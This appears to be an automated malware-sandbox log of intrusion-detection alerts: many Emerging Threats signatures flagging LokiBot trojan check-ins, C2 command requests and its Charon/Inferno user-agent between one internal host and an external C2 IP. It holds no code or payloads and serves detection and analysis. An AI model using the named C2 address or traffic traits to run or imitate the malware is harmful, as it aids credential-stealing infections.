Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:34.610079
SID:	2024313
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:42.416972
SID:	2025381
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:34.610079
SID:	2024318
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:30.670976
SID:	2021641
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:09.042243
SID:	2025381
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:55.796602
SID:	2021641
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:23.522239
SID:	2024313
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:51.243601
SID:	2021641
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:00.331066
SID:	2024313
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:58.122430
SID:	2021641
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:56.921190
SID:	2025381
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:48.477935
SID:	2025381
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:00.331066
SID:	2024318
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:39.958519
SID:	2025381
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:50.546988
SID:	2025381
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:25.036535
SID:	2825766
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:17.269664
SID:	2825766
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:34.982502
SID:	2025381
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:09.892413
SID:	2025381
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:49.855566
SID:	2021641
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:23.522239
SID:	2024318
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:44.645218
SID:	2825766
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:45.335995
SID:	2025381
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:01.844436
SID:	2025381
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:36.151380
SID:	2021641
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:24.205256
SID:	2024318
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:55.534565
SID:	2024318
Source Port:	49854
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:01.015339
SID:	2825766
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:46.856471
SID:	2021641
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:28.952090
SID:	2825766
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:38.419517
SID:	2825766
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:14.340654
SID:	2021641
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:20.198908
SID:	2025381
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:28.125041
SID:	2825766
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:51.243601
SID:	2825766
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:59.640455
SID:	2024313
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:51.126318
SID:	2021641
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:25.764699
SID:	2024313
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:24.205256
SID:	2024313
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:25.764699
SID:	2024318
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:55.534565
SID:	2024313
Source Port:	49854
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:59.640455
SID:	2024318
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:18.685116
SID:	2021641
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:24.221116
SID:	2021641
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:46.022620
SID:	2024313
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:56.219175
SID:	2825766
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:37.702889
SID:	2024313
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:46.022620
SID:	2024318
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:32.210551
SID:	2025381
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:25.030663
SID:	2025381
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:25.719182
SID:	2025381
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:11.400710
SID:	2825766
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:35.672062
SID:	2024313
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:31.366751
SID:	2021641
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:03.254673
SID:	2825766
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:35.672062
SID:	2024318
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:43.957176
SID:	2024313
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:33.600213
SID:	2021641
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:43.957176
SID:	2024318
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:37.702889
SID:	2024318
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:47.687505
SID:	2025381
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:49.163901
SID:	2024313
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:14.340654
SID:	2825766
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:36.850228
SID:	2025381
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:53.324729
SID:	2021641
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:43.265047
SID:	2025381
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:20.890742
SID:	2021641
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:46.856471
SID:	2825766
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:44.645218
SID:	2021641
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:58.810149
SID:	2025381
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:49.855566
SID:	2825766
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:38.407237
SID:	2021641
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:11.400710
SID:	2021641
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:49.163901
SID:	2024318
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:59.640455
SID:	2825766
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:51.243601
SID:	2024318
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:18.685116
SID:	2025381
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:47.778229
SID:	2021641
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:51.243601
SID:	2024313
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:54.842169
SID:	2025381
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:51.813478
SID:	2024318
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:05.938500
SID:	2024318
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:12.911562
SID:	2021641
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:40.106892
SID:	2025381
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:05.938500
SID:	2024313
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:29.987306
SID:	2021641
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:51.813478
SID:	2024313
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:15.873778
SID:	2021641
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:24.221116
SID:	2025381
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:46.959263
SID:	2825766
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:55.534565
SID:	2021641
Source Port:	49854
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:51.947017
SID:	2825766
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:09.042243
SID:	2021641
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:58.810149
SID:	2024318
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:55.108965
SID:	2024313
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:58.810149
SID:	2024313
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:20.890742
SID:	2825766
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:34.282252
SID:	2825766
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:32.267354
SID:	2021641
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:54.423488
SID:	2021641
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:33.791207
SID:	2825766
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:36.850228
SID:	2024313
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:55.108965
SID:	2024318
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:36.850228
SID:	2024318
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:06.650555
SID:	2025381
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:33.791207
SID:	2025381
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:37.702889
SID:	2825766
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:24.205256
SID:	2021641
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:49.062804
SID:	2025381
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:37.043826
SID:	2021641
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:48.379699
SID:	2021641
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:46.022620
SID:	2021641
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:41.484457
SID:	2825766
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:09.892413
SID:	2024318
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:48.477935
SID:	2024313
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

